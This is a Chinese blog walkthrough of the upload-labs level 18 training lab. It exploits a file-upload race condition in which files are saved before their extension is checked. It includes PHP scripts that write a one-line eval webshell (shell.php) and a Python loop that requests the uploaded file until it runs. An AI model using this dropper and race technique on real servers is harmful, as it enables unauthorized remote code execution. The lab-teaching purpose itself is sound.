devbox
从前慢现在也慢
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

文件上传upload-labs 第18关 条件竞争_upload-labs18

作者:从前慢现在也慢 | 2024-04-28 18:35:05

upload-labs18

分析

        这是由于逻辑顺序判断不严谨而导致的一个漏洞。白盒角度分析代码执行顺序是先将上传的文件移动到一个目标路径,然后检查文件的扩展名是否在允许的数组中,如果不是,就删除文件,如果是,就重命名文件。

       在检查和删除文件之前,这个文件已经保存到服务器目标路径上了,因此有可能访问到还没来得及检查删除的文件。

       如果上传的文件是一个PHP脚本,那么在删除之前就有可能被访问执行。

       即使前面的顺序改过来了,还有一点就是这一关是先移动文件再重命名的,同样会有一个时间差可以访问到上传的文件,这个是在下一关的突破点。

以下PHP代码在执行成功时创建一个shell.php并写入后门代码。

  1. <?php 
  2.  
  3. if (!file_exists('shell.php') && file_put_contents('shell.php', '<?php @eval($_POST[\'x\']);?>')) { 
  4.  
  5.     echo "The shell.php file was successfully created and the content has been written.\n"
  6.  
  7. } else
  8.  
  9.     echo "The file shell.php already exists.\n"
  10.  
  12.  
  13. ?>
  1. <?php
  2.  
  3. // 记得转义单引号或者用双引号区分
  4.  
  5. $newScriptContent = '<?php @eval($_POST[\'x\']);?>';
  6.  
  7. // 新脚本的文件名
  8.  
  9. $newScriptFilename = 'shell.php';
  10.  
  11. // 检查文件是否存在
  12.  
  13. if (!file_exists($newScriptFilename)) {
  14.  
  15.     // 创建新脚本文件
  16.  
  17.     $file = fopen($newScriptFilename, 'w');
  18.  
  19.     if ($file) {
  20.  
  21.         fwrite($file, $newScriptContent);
  22.  
  23.         fclose($file);
  24.  
  25.         echo "The $newScriptFilename file was successfully created and the content has been written.\n";
  26.  
  27.     } else {
  28.  
  29.         echo "File $newScriptFilename failed to create.\n";
  30.  
  31.     }
  32.  
  33. } else {
  34.  
  35.     echo "The file $newScriptFilename already exists.\n";
  36.  
  37. }
  38.  
  39. ?>

以下python代码高频访问移动之后未被删除之前的php脚本。

  1. import requests
  2.  
  3. import time
  4.  
  5. # 设置目标网站的URL
  6.  
  7. url = "xxx"
  8.  
  9. # 设置每秒的访问次数
  10.  
  11. rate = 5
  12.  
  13. # 设置持续的时间
  14.  
  15. duration = 60
  16.  
  17. # 计算每次访问的间隔
  18.  
  19. interval = 1 / rate
  20.  
  21. # 初始化开始时间
  22.  
  23. start_time = time.time()
  24.  
  25. # 初始化访问次数
  26.  
  27. count = 0
  28.  
  29. # 在持续时间内重复发送请求
  30.  
  31. while time.time() - start_time < duration:
  32.  
  33.     try:
  34.  
  35.         # 发送请求并获取响应
  36.  
  37.         response = requests.get(url)
  38.  
  39.         # 计数
  40.  
  41.         count += 1
  42.  
  43.         # 响应的文本内容里有"successfully"或者"exists"就停止循环
  44.  
  45.          if "successfully" in response.text or "exists" in response.text:
  46.  
  47.             print("ok" + "Status code - " + str(response.status_code) + "\n")
  48.  
  49.             # 获取返回的文本内容
  50.  
  51.             print(response.text)
  52.  
  53.             break
  54.  
  55.         time.sleep(interval)
  56.  
  57.     except requests.RequestException as e:
  58.  
  59.         # 输出异常信息并退出循环
  60.  
  61.         print("Error: " + str(e))
  62.  
  63.         break
  64.  
  65.  
  66.  
  67. print("总请求次数: " + str(count))
  68.  
  69.  

演示

       由于文件移动到目标路径在前,拓展名检查在后,所以本关是任意文件上传

       只需要不断的上传的文件,可以观察到服务器会有上传的文件一闪而过。所以可以通过python脚本不断的访问,在文件被删除之前触发执行上传的文件。

       即使执行了上传的的文件,这个文件执行之后也会被检测删除。无所谓,上传的文件生成webshell不会被删除。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/503690
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号